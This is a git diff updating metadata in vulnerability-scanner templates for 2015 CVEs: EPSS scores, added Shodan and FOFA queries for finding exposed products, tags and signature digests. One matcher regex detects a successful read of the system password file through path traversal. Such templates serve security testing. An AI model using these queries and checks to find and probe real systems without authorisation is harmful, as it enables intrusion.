--git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml index 8b1cbf521f..0a62a16182 100644 --- a/http/cves/2015/CVE-2015-1579.yaml +++ b/http/cves/2015/CVE-2015-1579.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 - epss-score: 0.90145 - epss-percentile: 0.9855 + epss-score: 0.82302 + epss-percentile: 0.98398 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fcfcc25ab96536af2b8e2b1cae82b3f057a0f60ebf41c8d3f6f4bd029879ef302206acf0ff4e2fd19087e94cb9beb1a8add10fabd4a24597cdf7bd81207a40ae383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index 4398251cff..e257bd67b0 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -17,15 +17,18 @@ info: cvss-score: 10 cve-id: CVE-2015-1635 cwe-id: CWE-94 - epss-score: 0.97537 - epss-percentile: 0.99992 + epss-score: 0.9754 + epss-percentile: 0.99994 cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: microsoft product: windows_7 - shodan-query: '"Microsoft-IIS" "2015"' + shodan-query: + - '"Microsoft-IIS" "2015"' + - '"microsoft-iis" "2015"' + - cpe:"cpe:2.3:o:microsoft:windows_7" tags: cve,cve2015,kev,microsoft,iis,rce http: @@ -48,4 +51,4 @@ http: part: header words: - "Microsoft" -# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220098bb1e7e16f1550e029d56486663dbfae1e69203999a8d8599b0639379267ca02207800afef5ec0001642d15fa91a241092955036e798a7946dd21c095aeefedef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index da134bc3b4..46abefa068 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -21,12 +21,20 @@ info: cve-id: CVE-2015-1880 cwe-id: CWE-79 epss-score: 0.00201 - epss-percentile: 0.57435 + epss-percentile: 0.58077 cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fortinet product: fortios + shodan-query: + - http.html:"/remote/login" "xxxxxxxx" + - http.favicon.hash:945408572 + - cpe:"cpe:2.3:o:fortinet:fortios" + - port:10443 http.favicon.hash:945408572 + fofa-query: + - body="/remote/login" "xxxxxxxx" + - icon_hash=945408572 tags: cve2015,cve,xss,fortigates,intrusive,fortinet http: @@ -49,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c54ae32d29d47fa21ce8300d23ac02ba93e607a1068d192427093deeb6a4d7e202204ca42733daf0504457f36a6da2ec6d0fbce7eba1f337becbff74f1155ab410a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml index 63f8969bfe..fe51fb40bf 100644 --- a/http/cves/2015/CVE-2015-20067.yaml +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -29,7 +29,7 @@ info: product: wp_attachment_export framework: wordpress google-query: inurl:"/wp-content/plugins/wp-attachment-export/" - tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export + tags: wpscan,packetstorm,seclists,cve,cve2015,wordpress,wp,wp-plugin,unauth,wp-attachment-export,wp_attachment_export_project http: - method: GET @@ -45,4 +45,4 @@ http: - 'contains(header, "text/xml")' - 'contains_all(body, "title","wp:author_id","wp:author_email")' condition: and -# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f69e199c7ba96eff64038c8b2f6999fb61c5dd102291a04bea401c3df6eb41a022100aab06b2f86c3ffa190afc44f39e5b21a17da65caaeb89d37919f844c105eabe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index bd3ab9b0c6..947c860c18 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -27,7 +27,9 @@ info: vendor: magmi_project product: magmi framework: magento_server - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server http: @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098c40f6c8c0649ca609f84e623426e75d8b4585cd3c8a8170af7ad182b173602022039dd4d44ad7c15033383f04ab8c95596af9694c2bd91a5d278cd8c0211408051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201353ea7187a1f9c29751699fff1087525bba47f580ba3dd00f1b2452ed2e3979022100f18f15490a5ff61402b95bd4b23f40ae41ac30e76bae6c49bdb4a63b3159806a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index db07a3904a..e384e9d4ea 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2015-2068 cwe-id: CWE-79 epss-score: 0.00146 - epss-percentile: 0.4958 + epss-percentile: 0.50455 cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:* metadata: verified: true @@ -28,7 +28,9 @@ info: vendor: magmi_project product: magmi framework: magento_server - shodan-query: http.component:"Magento" + shodan-query: + - http.component:"Magento" + - http.component:"magento" tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server http: @@ -51,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d726a8c4ca8fa63005a0a480346dd8c428fb8fc1d9d9015a9b6d140e0ab7c73022039d9def8ad4d1f2504466366c3119bf4d261ca81f8f43d41557090180788167a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml index affbf5e835..892a6b23ea 100644 --- a/http/cves/2015/CVE-2015-2080.yaml +++ b/http/cves/2015/CVE-2015-2080.yaml @@ -18,13 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2080 cwe-id: CWE-200 - epss-score: 0.95465 - epss-percentile: 0.99329 + epss-score: 0.95345 + epss-percentile: 0.99356 cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:* metadata: max-request: 1 vendor: fedoraproject product: fedora + shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora" tags: cve2015,cve,jetty,packetstorm,fedoraproject http: @@ -45,4 +46,4 @@ http: - type: status status: - 400 -# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090b66032656a55663721d240362a3514462a90c3228a98ac576768f9833c27d2022070f821ea45564431e8bea158126f890008c77c8c569bd6a7047652639d07259e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml index 045252b92f..797b5bbf5b 100644 --- a/http/cves/2015/CVE-2015-2166.yaml +++ b/http/cves/2015/CVE-2015-2166.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-2166 cwe-id: CWE-22 - epss-score: 0.23272 - epss-percentile: 0.96445 + epss-score: 0.29639 + epss-percentile: 0.96917 cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ee6af0a974f33dcc7b5fe8f9f4cb703696f43a32588369a8fc83104b162ff3002206ff427f007fb430ad833f19fcc71c4523a959037201b4610e8a5848b66f97a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml index 2e0903f253..7e901fa40c 100644 --- a/http/cves/2015/CVE-2015-2196.yaml +++ b/http/cves/2015/CVE-2015-2196.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2015-2196 cwe-id: CWE-89 - epss-score: 0.0025 - epss-percentile: 0.6433 + epss-score: 0.00253 + epss-percentile: 0.65124 cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:* metadata: verified: true @@ -44,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "{\"status\":true,\"data\"")' condition: and -# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml index 1c126b301d..af2ccb1f13 100644 --- a/http/cves/2015/CVE-2015-2755.yaml +++ b/http/cves/2015/CVE-2015-2755.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2015-2755 cwe-id: CWE-352 epss-score: 0.01828 - epss-percentile: 0.87952 + epss-percentile: 0.88216 cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,7 +30,7 @@ info: vendor: ab_google_map_travel_project product: ab_google_map_travel framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project + tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project http: - raw: @@ -56,4 +56,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "ab-google-map-travel")' condition: and -# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dda7ff953b221b559dcea855c1c3673c49450581b89d2b7eb7941894951394fa022100cb6fb992be83baf795c00ba8f2d800eeb418a3a9033cff48b2064f725119f3f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 54b047868a..5b543dc622 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -17,15 +17,17 @@ info: cvss-score: 9.8 cve-id: CVE-2015-2794 cwe-id: CWE-264 - epss-score: 0.97458 - epss-percentile: 0.99953 + epss-score: 0.9743 + epss-percentile: 0.99939 cpe: cpe:2.3:a:dotnetnuke:dotnetnuke:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: dotnetnuke product: dotnetnuke - fofa-query: app="DotNetNuke" + fofa-query: + - app="DotNetNuke" + - app="dotnetnuke" tags: cve2015,cve,dotnetnuke,auth-bypass,install http: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df3600ba2b662af9e71b76d868f9a42f08b1f15c5b7881c53ba541c0388905dc02205da04ef1d20450af59dff15188a2f2d4fd774ffb9ec34ade645d109d07fa747b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 7f5783fa83..7c482eb771 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -21,16 +21,15 @@ info: cve-id: CVE-2015-2807 cwe-id: CWE-79 epss-score: 0.00294 - epss-percentile: 0.68624 + epss-percentile: 0.69186 cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 + max-request: 2 vendor: documentcloud - product: navis_documentcloud + product: "navis_documentcloud" framework: wordpress - google-query: inurl:"/wp-content/plugins/navis-documentcloud" + google-query: "inurl:\"/wp-content/plugins/navis-documentcloud\"" tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud - flow: http(1) && http(2) http: @@ -66,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210088a6906ad39a7b6d77f1bf0198de8fc5e3e1f59c7606690649f554952b8e71d5022100b42919235cda07c096a34dce69f2d8ff8b3e19d5f309acbac8bbea3e9140e5fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008418d2714302c8bacc72c22070c5fe1bf5bc9dc6ac4cacb51866826fa4f200d1022100d8f0ccc1356d763c2f1fe636841bdbe79932f0635144a2ca3e028cb8a0fd2989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2996.yaml b/http/cves/2015/CVE-2015-2996.yaml index 56ac0bbd61..7337ce8150 100644 --- a/http/cves/2015/CVE-2015-2996.yaml +++ b/http/cves/2015/CVE-2015-2996.yaml @@ -29,6 +29,7 @@ info: vendor: sysaid product: sysaid shodan-query: http.favicon.hash:1540720428 + fofa-query: icon_hash=1540720428 tags: cve2015,cve,sysaid,lfi,seclists http: @@ -48,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220312369a2b289aed97447a2b6f30dc5d2b433cdaaadac8006d3c5cdac9eac8bcb022100c6c5b7d290b6e9c305b740862e6371ed4874567dc834c7705e73d0655613aa73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082e020d9e8b2d5d7e7bef721183a3753d3d1f6e6d5edac73c48741770d80b66602205d8cf502e70a1a70092bcd7073f6e35af23efdbb2810f7f5d4def6c4926d45b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 534a9216db..da6236be0d 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -22,14 +22,18 @@ info: cve-id: CVE-2015-3035 cwe-id: CWE-22 epss-score: 0.58993 - epss-percentile: 0.97444 + epss-percentile: 0.97743 cpe: cpe:2.3:o:tp-link:tl-wr841n_\(9.0\)_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: tp-link product: tl-wr841n_\(9.0\)_firmware - shodan-query: http.title:"TP-LINK" + shodan-query: + - http.title:"TP-LINK" + - http.title:"tp-link" + fofa-query: title="tp-link" + google-query: intitle:"tp-link" tags: cve2015,cve,router,lfi,seclists,tplink,kev,tp-link http: @@ -46,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204768364244d39e7174ab745661a9b31b5c4a63196ef946111d7805224675b70b022100ffd194906b2d3558567d2e6ac11fa657016da8d600e7908912b66ece312d2f2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046a782c5b020339f7a059f064d6426515d64f7d62c917034ecb45a081cab8904022100abaa398c02df6a5b7dfa75e475d0ae03d1ec70111da5524f8d79ee4ebf414d07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3224.yaml b/http/cves/2015/CVE-2015-3224.yaml index df6b263f83..8be9c0187c 100644 --- a/http/cves/2015/CVE-2015-3224.yaml +++ b/http/cves/2015/CVE-2015-3224.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-3224 cwe-id: CWE-284 epss-score: 0.92904 - epss-percentile: 0.98975 + epss-percentile: 0.99025 cpe: cpe:2.3:a:rubyonrails:web_console:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -54,4 +54,4 @@ http: - data-session-id= case-insensitive: true condition: or -# digest: 4a0a00473045022100c4b2125a78ee523a116fd826ab60375b59dd4e7783faf87bb57fdb018ec7183702203cd169073ca993580b1ad5b798b29f12ea43ea85d77a1f8eb1fce8095e0a0b34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020354b064be7c3002811f57d9842df15bde98e6b50ddf1dd51805c572f6e204602200d5345769babb2b707fd686e022f805cacbf8216fabc09786c56c79672c5f14e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3337.yaml b/http/cves/2015/CVE-2015-3337.yaml index 2f802b7da9..7687592703 100644 --- a/http/cves/2015/CVE-2015-3337.yaml +++ b/http/cves/2015/CVE-2015-3337.yaml @@ -20,13 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2015-3337 cwe-id: CWE-22 - epss-score: 0.96447 - epss-percentile: 0.9948 + epss-score: 0.96187 + epss-percentile: 0.99512 cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elasticsearch product: elasticsearch + fofa-query: index_not_found_exception tags: cve2015,cve,packetstorm,edb,elastic,lfi,elasticsearch,plugin http: @@ -44,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206b4169ea4037924ebdc00d3cc7130c430dcd5ec43759ee09a9f082345b65f7dd022100c41635084e4f84a3e64265efc16c730e5b4725552238f864784bae130304e1f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ce84a33308ba91f840d72b0a7827eeac30ca40dc21c36c701fc5dbaa6f157a2b022100f31c7e0fdee69d860230c8851f1f3d5365c67282b42a537b80b3326e2c10b744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index 68f3b923e4..3d55b097b3 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2015-3897 cwe-id: CWE-22 - epss-score: 0.83225 - epss-percentile: 0.98353 + epss-score: 0.74714 + epss-percentile: 0.98145 cpe: cpe:2.3:a:bonitasoft:bonita_bpm_portal:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -50,4 +50,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006f2647ffb7ae5ad85523c66d30ff1d58ab95bd1625b4ffda762c5e8469a284d02204b701b13a6749a43c74cd44f8c83779fac26dff7f2aac6dc002e9b0879870667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4050.yaml b/http/cves/2015/CVE-2015-4050.yaml index dc67e6688d..77fa62312e 100644 --- a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -21,12 +21,13 @@ info: cve-id: CVE-2015-4050 cwe-id: CWE-284 epss-score: 0.00598 - epss-percentile: 0.77957 + epss-percentile: 0.78364 cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sensiolabs product: symfony + shodan-query: cpe:"cpe:2.3:a:sensiolabs:symfony" tags: cve2015,cve,symfony,rce,sensiolabs http: @@ -44,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d90f99fa4301493aeb28357b0ea4b46a40cbec4e3b675583644ef665e08e35d802206e03ca08917179f4e6306da4db59165d5a748a0c444859583cc72335a9d4c673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cdb12fbdd55efd4a36a417af3dd59a6c9ce9fd1847a88795418e2dc805b8f5a40220218f2336204c209621417f54d0af76c9753c78445a9415bdd511fe025e74aa0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index a3086ce3cd..76052a00b2 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03919 - epss-percentile: 0.91099 + epss-score: 0.0272 + epss-percentile: 0.90505 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcd5207100a25aa6acd80942d2d62778a16671bd660cbca07d14fbd2f428866302203a50b15dd5bb3baa63c92c70557e4decd1922f775ba2d5723d9c48d52600cd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index f569a4a3d6..1a82fdacfa 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91867 + epss-percentile: 0.92055 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204dcfbadcca5be302e9005c92913b307c97309c8e974acf2bdb99f4df9740f6ff022100802868c4ad97fb42dfac7d60809e03080f19074c6cba1131c3bd4e5da034414c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index 7b9c50d4cb..5e7c940520 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2015-4074 cwe-id: CWE-22 epss-score: 0.00598 - epss-percentile: 0.77961 + epss-percentile: 0.78367 cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100858bd9184ab4903ccc7d5fa3c75fd32dc9262c548751d820e7c72d49c59bcc4e02204c3c23267a39aa31540f8ee763a21847dc7d465a33cbfb9763ac7562f8adbbf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index d418678913..2b056ab4ea 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -15,21 +15,21 @@ info: - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-4127 cwe-id: CWE-79 epss-score: 0.0034 - epss-percentile: 0.68397 + epss-percentile: 0.71383 cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: church_admin_project - product: church_admin + max-request: 2 + vendor: "church_admin_project" + product: "church_admin" framework: wordpress tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project - flow: http(1) && http(2) http: @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2bba005d286e24c95a6dfe796e8786b5c85cd27546075c7a065f17cdda0e812022100bf92e40b7701ce29e61ebadda71943ffdeba45f4eff6b0c653f0e01bf542ff88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 39485d2025..c3bb4b15ba 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -9,19 +9,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-4455 - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2015-4455 cwe-id: CWE-434 - epss-score: 0.28491 - epss-percentile: 0.96807 + epss-score: 0.55856 + epss-percentile: 0.97673 cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:* metadata: - vendor: aviary_image_editor_add-on_for_gravity_forms_project - product: aviary_image_editor_add-on_for_gravity_forms + max-request: 2 + vendor: "aviary_image_editor_add-on_for_gravity_forms_project" + product: "aviary_image_editor_add-on_for_gravity_forms" framework: wordpress - tags: cve,cve2015,packetstorm,intrusive,file-upload + tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project variables: filename: '{{rand_base(7, "abc")}}' @@ -66,4 +68,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and -# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022067d4626f991b5320d154fca6def6dc21753ef35f5a0543c467bc488dbacf5566022054458f7ad78bf887b24f12116181f91e185b42ead7bc422d614c165d4df94783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4632.yaml 